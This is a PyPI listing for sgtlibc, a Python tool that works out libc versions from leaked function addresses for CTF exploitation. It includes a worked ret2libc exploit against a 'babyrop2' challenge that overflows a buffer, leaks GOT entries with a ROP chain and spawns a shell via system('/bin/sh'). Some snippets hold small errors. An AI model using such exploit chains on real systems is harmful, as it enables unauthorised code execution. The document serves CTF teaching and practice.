Name | sgtlibc JSON |
Version |
1.16.0
JSON |
| download |
home_page | https://github.com/serfend/sgtlibc |
Summary | a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)` |
upload_time | 2023-08-10 15:46:05 |
maintainer | |
docs_url | None |
author | serfend |
requires_python | >=3.7, <4 |
license | MIT Licence |
keywords |
libcsearcher
|
VCS |
|
bugtrack_url |
|
requirements |
No requirements were recorded.
|
Travis-CI |
No Travis.
|
coveralls test coverage |
No coveralls.
|
<p align="center">
<a href="https://visitorbadge.io/status?path=https%3A%2F%2Fgithub.com%2Fserfend%2Fsgtlibc%2F"><img src="https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fserfend%2Fsgtlibc%2F&labelColor=%23697689&countColor=%23ff8a65&style=plastic&labelStyle=none" /></a>
<a href="https://pypi.python.org/pypi/sgtlibc/"><img alt="pypi version" src="https://img.shields.io/pypi/v/sgtlibc.svg" /></a>
<a href="https://pypistats.org/packages/sgtlibc"><img alt="pypi download" src="https://img.shields.io/pypi/dm/sgtlibc.svg" /></a>
<a href="https://github.com/serfend/sgtlibc/releases"><img alt="GitHub release" src="https://img.shields.io/github/release/serfend/sgtlibc.svg?style=flat-square" /></a>
<a href="https://github.com/serfend/sgtlibc/releases"><img alt="GitHub All Releases" src="https://img.shields.io/github/downloads/serfend/sgtlibc/total.svg?style=flat-square&color=%2364ff82" /></a>
<a href="https://github.com/serfend/sgtlibc/commits"><img alt="GitHub last commit" src="https://img.shields.io/github/last-commit/serfend/sgtlibc.svg?style=flat-square" /></a>
<!-- <a href="https://github.com/serfend/sgtlibc/actions/workflows/pytest.yml"><img alt="GitHub Workflow Status" src="https://github.com/serfend/sgtlibc/actions/workflows/pytest.yml/badge.svg" /></a> -->
</p>
![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)![Ubuntu](https://img.shields.io/badge/Ubuntu-E95420?style=for-the-badge&logo=ubuntu&logoColor=white)![Kali](https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white)![FreeBSD](https://img.shields.io/badge/-FreeBSD-%23870000?style=for-the-badge&logo=freebsd&logoColor=white)![Deepin](https://img.shields.io/badge/Deepin-007CFF?style=for-the-badge&logo=deepin&logoColor=white)![Debian](https://img.shields.io/badge/Debian-D70A53?style=for-the-badge&logo=debian&logoColor=white)![Cent OS](https://img.shields.io/badge/cent%20os-002260?style=for-the-badge&logo=centos&logoColor=F0F0F0)
# What?
[sgtlibc](https://github.com/serfend/sgtlibc) is a a offline python-lib for search libc function.
## Install
```shell
pip install sgtlibc
```
## Usage
```shell
usage: sgtlibc [-h] [-d [DUMP ...]] [-i [INDEX]] [-s [SYMBOLS]] [-u [UPDATE]] [-v [VERSION]] [funcs_with_addresses]
a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s =
sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`
positional arguments:
funcs_with_addresses specify `func-name` and `func address` , split by `|`,eg: puts:aa0+read:140 , its means func-puts address = 0xaa0;func-read address = 0x140 (default: None).
options:
-h, --help show this help message and exit
-d [DUMP ...], --dump [DUMP ...]
select funcs to dump its info (default: ['__libc_start_main_ret', 'system', 'dup2', 'read', 'write', 'str_bin_sh']).
-i [INDEX], --index [INDEX]
db index on multi-database found occation (default: 0).
-s [SYMBOLS], --symbols [SYMBOLS]
convert libc-elf file to symbols-file,use `libc_path [alias]` to convert.
-u [UPDATE], --update [UPDATE]
update current libc database from internet , need non-microsoft-windows environment (default: False).
-v [VERSION], --version [VERSION]
show version
```
## Quick Start
- in cmd.exe` or `/bin/sh`
```shell
sgtlibc puts:aa0
sgtlibc puts:aa0+read:140
sgtlibc puts:aa0+read:140 --dump system binsh
```
- in `python3`
```python
import sgtlibc
s = sgtlibc.Searcher()
s.add_condition('puts', 0xaa0)
s.add_condition('read',0x140)
print(s.dump())
print(s.dump(['system','str_bin_sh']))
```
## Example
- `main args` specify `func-name` and `func address` ,**SHOULD split by `|` **
eg: `puts:aa0+read:140` which means:
- func-`puts` address = `0xaa0`
- func-`read` address =` 0x140`
- `--update` is for update libc database from internet base on `libc-database` , **require non-microsoft-window** system
### python run
- run [python code above](/#/Quick Start) , you'll get output-result like following shows:
![image-20220605212842313](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605212842313.png)
### command run
- run command in terminal , you'll get output-result like following shows:
![image-20220605213023151](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605213023151.png)
### pwntools run
- use in `pwntools`
```python
from pwn import * # should run pip install pwntools before
import sgtlibc
s = libc.Searcher()
puts_addr = 0xf71234567aa0 # from leak data
s.add_condition('puts',puts_addr)
s.dump(db_index=0) # search libc , if returns multi-result ,default use index-0's result
system_addr = p00(s.get_address(sgtlibc.s_system))
binsh_addr = p00(s.get_address(sgtlibc.s_binsh))
```
### use user-libc database
> search libc from user-directory
```python
from sgtlibc.utils import configuration as config
def test_use_user_libc():
lib_path = './libs' # here input your libc directory
config.set(config.extension_database_path, lib_path)
s = LibcSearcher('puts', 0xf7007)
s.decided()
```
### add user-libc database
> add a libc.so file to database
```bash
sgtlibc -s ./libc.from_user.so:alias_input_here
```
or
```python
from sgtlibc.main import do_symbols
do_symbols(f'./libc.from_user.so:alias_input_here')
```
## CTF Problem Solve DEMO
[view all sameple files](https://github.com/serfend/sgtlibc/tree/main/samples/libc-leak/x64-babyrop)
- use exploit code
```python
import sgtlibc
from sgtlibc.gamebox import *
set_config(GameBoxConfig(
is_local=True, file='./babyrop2', remote='192.168.0.1:25462',
auto_load=True,
auto_show_rop=True,
auto_show_summary=True,
auto_start_game=True,
auto_load_shell_str=True,
auto_show_symbols=True
))
s = sgtlibc.Searcher()
elf = client.elf
def exp():
payload_exp = [b'a' * (28 + 4),fakeebp()] # overflow position
return payload_exp
def leak(func: str):
payload = exp()
# here will auto-pack to p64, you can use p64 or p00 as same effect.
payload += [elf.rop['rdi'],elf.got[func],elf.plt['printf'],elf.symbols['main']]
sl(payload)
rl()
data = rc(6).ljust(8, b'\0')
data = uc(data)
s.add_condition(func, data)
return data
leak('printf')
leak('read')
data = s.dump(db_index=2) # choose your system index
system_addr = s.get_address(sgtlibc.s_system)
binsh_addr = s.get_address(sgtlibc.s_binsh)
log.info(f'system_addr:{hex(system_addr)}')
log.info(f'binsh_addr:{hex(binsh_addr)}')
payload = exp()
payload += [elf.rop['rdi'],binsh_addr,system_addr, fakeebp()]
sl(payload)
interactive()
```
- result
![image-20220609134743902](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220609134743902.png)
## Notice
> default libc database is update on `2022-06-01`,which long-time ago , we fully recommanded to update it by run `sgtlibc --update`
## Status
![Alt](https://repobeats.axiom.co/api/embed/7d8920fddffed00ee7feb8d172bc7b48c86da3b8.svg "Repobeats analytics image")
Raw data
{
"_id": null,
"home_page": "https://github.com/serfend/sgtlibc",
"name": "sgtlibc",
"maintainer": "",
"docs_url": null,
"requires_python": ">=3.7, <4",
"maintainer_email": "",
"keywords": "libcsearcher",
"author": "serfend",
"author_email": "serfend@foxmail.com",
"download_url": "https://files.pythonhosted.org/packages/f2/ba/a379a21402c2c874f74bfbb193e7af50d7e5681897a8c66a57cd4349c32f/sgtlibc-1.16.0.tar.gz",
"platform": "any",
"description": "\n\n<p align=\"center\">\n <a href=\"https://visitorbadge.io/status?path=https%3A%2F%2Fgithub.com%2Fserfend%2Fsgtlibc%2F\"><img src=\"https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fserfend%2Fsgtlibc%2F&labelColor=%23697689&countColor=%23ff8a65&style=plastic&labelStyle=none\" /></a>\n <a href=\"https://pypi.python.org/pypi/sgtlibc/\"><img alt=\"pypi version\" src=\"https://img.shields.io/pypi/v/sgtlibc.svg\" /></a> \n <a href=\"https://pypistats.org/packages/sgtlibc\"><img alt=\"pypi download\" src=\"https://img.shields.io/pypi/dm/sgtlibc.svg\" /></a>\n <a href=\"https://github.com/serfend/sgtlibc/releases\"><img alt=\"GitHub release\" src=\"https://img.shields.io/github/release/serfend/sgtlibc.svg?style=flat-square\" /></a>\n <a href=\"https://github.com/serfend/sgtlibc/releases\"><img alt=\"GitHub All Releases\" src=\"https://img.shields.io/github/downloads/serfend/sgtlibc/total.svg?style=flat-square&color=%2364ff82\" /></a>\n <a href=\"https://github.com/serfend/sgtlibc/commits\"><img alt=\"GitHub last commit\" src=\"https://img.shields.io/github/last-commit/serfend/sgtlibc.svg?style=flat-square\" /></a>\n <!-- <a href=\"https://github.com/serfend/sgtlibc/actions/workflows/pytest.yml\"><img alt=\"GitHub Workflow Status\" src=\"https://github.com/serfend/sgtlibc/actions/workflows/pytest.yml/badge.svg\" /></a> -->\n</p>\n\n\n\n\n\n![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)![Ubuntu](https://img.shields.io/badge/Ubuntu-E95420?style=for-the-badge&logo=ubuntu&logoColor=white)![Kali](https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white)![FreeBSD](https://img.shields.io/badge/-FreeBSD-%23870000?style=for-the-badge&logo=freebsd&logoColor=white)![Deepin](https://img.shields.io/badge/Deepin-007CFF?style=for-the-badge&logo=deepin&logoColor=white)![Debian](https://img.shields.io/badge/Debian-D70A53?style=for-the-badge&logo=debian&logoColor=white)![Cent OS](https://img.shields.io/badge/cent%20os-002260?style=for-the-badge&logo=centos&logoColor=F0F0F0)\n\n# What?\n\n[sgtlibc](https://github.com/serfend/sgtlibc) is a a offline python-lib for search libc function.\n\n\n\n## Install\n\n```shell\npip install sgtlibc\n```\n\n\n\n## Usage\n\n```shell\nusage: sgtlibc [-h] [-d [DUMP ...]] [-i [INDEX]] [-s [SYMBOLS]] [-u [UPDATE]] [-v [VERSION]] [funcs_with_addresses]\n\na offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s =\nsgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`\n\npositional arguments:\n funcs_with_addresses specify `func-name` and `func address` , split by `|`,eg: puts:aa0+read:140 , its means func-puts address = 0xaa0;func-read address = 0x140 (default: None).\n\noptions:\n -h, --help show this help message and exit\n -d [DUMP ...], --dump [DUMP ...]\n select funcs to dump its info (default: ['__libc_start_main_ret', 'system', 'dup2', 'read', 'write', 'str_bin_sh']).\n -i [INDEX], --index [INDEX]\n db index on multi-database found occation (default: 0).\n -s [SYMBOLS], --symbols [SYMBOLS]\n convert libc-elf file to symbols-file,use `libc_path [alias]` to convert.\n -u [UPDATE], --update [UPDATE]\n update current libc database from internet , need non-microsoft-windows environment (default: False).\n -v [VERSION], --version [VERSION]\n show version\n```\n\n\n\n\n\n## Quick Start\n\n- in cmd.exe` or `/bin/sh`\n\n```shell\nsgtlibc puts:aa0\nsgtlibc puts:aa0+read:140\nsgtlibc puts:aa0+read:140 --dump system binsh\n```\n\n- in `python3`\n\n```python\nimport sgtlibc\ns = sgtlibc.Searcher()\ns.add_condition('puts', 0xaa0)\ns.add_condition('read',0x140)\nprint(s.dump())\nprint(s.dump(['system','str_bin_sh']))\n```\n\n\n\n## Example\n\n- `main args` specify `func-name` and `func address` ,**SHOULD split by `|` **\n\n eg: `puts:aa0+read:140` which means:\n\n - func-`puts` address = `0xaa0`\n - func-`read` address =` 0x140`\n\n- `--update` is for update libc database from internet base on `libc-database` , **require non-microsoft-window** system\n\n### python run\n\n- run [python code above](/#/Quick Start) , you'll get output-result like following shows:\n\n![image-20220605212842313](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605212842313.png)\n\n### command run\n\n- run command in terminal , you'll get output-result like following shows:\n\n ![image-20220605213023151](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605213023151.png)\n\n### pwntools run\n\n- use in `pwntools`\n\n```python\nfrom pwn import * # should run pip install pwntools before\nimport sgtlibc\ns = libc.Searcher()\nputs_addr = 0xf71234567aa0 # from leak data\ns.add_condition('puts',puts_addr)\ns.dump(db_index=0) # search libc , if returns multi-result ,default use index-0's result\nsystem_addr = p00(s.get_address(sgtlibc.s_system))\nbinsh_addr = p00(s.get_address(sgtlibc.s_binsh))\n```\n\n\n\n### use user-libc database\n\n> search libc from user-directory\n\n```python\nfrom sgtlibc.utils import configuration as config\ndef test_use_user_libc():\n lib_path = './libs' # here input your libc directory\n config.set(config.extension_database_path, lib_path)\n s = LibcSearcher('puts', 0xf7007)\n s.decided()\n```\n\n\n\n### add user-libc database\n\n> add a libc.so file to database\n\n```bash\nsgtlibc -s ./libc.from_user.so:alias_input_here\n```\n\nor\n\n```python\nfrom sgtlibc.main import do_symbols\ndo_symbols(f'./libc.from_user.so:alias_input_here')\n```\n\n## CTF Problem Solve DEMO\n\n[view all sameple files](https://github.com/serfend/sgtlibc/tree/main/samples/libc-leak/x64-babyrop)\n\n- use exploit code\n\n```python\nimport sgtlibc\nfrom sgtlibc.gamebox import *\nset_config(GameBoxConfig(\n is_local=True, file='./babyrop2', remote='192.168.0.1:25462',\n auto_load=True,\n auto_show_rop=True,\n auto_show_summary=True,\n auto_start_game=True,\n auto_load_shell_str=True,\n auto_show_symbols=True\n))\ns = sgtlibc.Searcher()\nelf = client.elf\ndef exp():\n\tpayload_exp = [b'a' * (28 + 4),fakeebp()] # overflow position\n return payload_exp\ndef leak(func: str):\n payload = exp()\n # here will auto-pack to p64, you can use p64 or p00 as same effect.\n payload += [elf.rop['rdi'],elf.got[func],elf.plt['printf'],elf.symbols['main']]\n sl(payload)\n rl()\n data = rc(6).ljust(8, b'\\0')\n data = uc(data)\n s.add_condition(func, data)\n return data\nleak('printf')\nleak('read')\ndata = s.dump(db_index=2) # choose your system index\nsystem_addr = s.get_address(sgtlibc.s_system)\nbinsh_addr = s.get_address(sgtlibc.s_binsh)\nlog.info(f'system_addr:{hex(system_addr)}')\nlog.info(f'binsh_addr:{hex(binsh_addr)}')\npayload = exp() \npayload += [elf.rop['rdi'],binsh_addr,system_addr, fakeebp()]\n \nsl(payload)\ninteractive()\n```\n\n- result\n\n![image-20220609134743902](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220609134743902.png)\n\n\n\n\n\n## Notice\n\n> default libc database is update on `2022-06-01`,which long-time ago , we fully recommanded to update it by run `sgtlibc --update`\n\n\n\n## Status\n\n![Alt](https://repobeats.axiom.co/api/embed/7d8920fddffed00ee7feb8d172bc7b48c86da3b8.svg \"Repobeats analytics image\")\n",
"bugtrack_url": null,
"license": "MIT Licence",
"summary": "a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`",
"version": "1.16.0",
"project_urls": {
"Homepage": "https://github.com/serfend/sgtlibc"
},
"split_keywords": [
"libcsearcher"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "00504a6f2ff9448848bd785508c1e722b8ed587c1749a3ac1516781ff775078a",
"md5": "f3c2bd826ae2bde51a8292acb8fd43e1",
"sha256": "923bd978608d96995318b7071ba5798d091fb853dbb494e58ea4082c6f166610"
},
"downloads": -1,
"filename": "sgtlibc-1.16.0-py3-none-any.whl",
"has_sig": false,
"md5_digest": "f3c2bd826ae2bde51a8292acb8fd43e1",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": ">=3.7, <4",
"size": 21498723,
"upload_time": "2023-08-10T15:46:02",
"upload_time_iso_8601": "2023-08-10T15:46:02.742497Z",
"url": "https://files.pythonhosted.org/packages/00/50/4a6f2ff9448848bd785508c1e722b8ed587c1749a3ac1516781ff775078a/sgtlibc-1.16.0-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "f2baa379a21402c2c874f74bfbb193e7af50d7e5681897a8c66a57cd4349c32f",
"md5": "4c82d1a4d0808616697c160443cbf302",
"sha256": "e1d6e7add0915a71e08f690a64c3113e36c0ccdec26162ac4ad4e26161f133b5"
},
"downloads": -1,
"filename": "sgtlibc-1.16.0.tar.gz",
"has_sig": false,
"md5_digest": "4c82d1a4d0808616697c160443cbf302",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3.7, <4",
"size": 20780588,
"upload_time": "2023-08-10T15:46:05",
"upload_time_iso_8601": "2023-08-10T15:46:05.839937Z",
"url": "https://files.pythonhosted.org/packages/f2/ba/a379a21402c2c874f74bfbb193e7af50d7e5681897a8c66a57cd4349c32f/sgtlibc-1.16.0.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2023-08-10 15:46:05",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "serfend",
"github_project": "sgtlibc",
"travis_ci": false,
"coveralls": false,
"github_actions": true,
"requirements": [],
"lcname": "sgtlibc"
}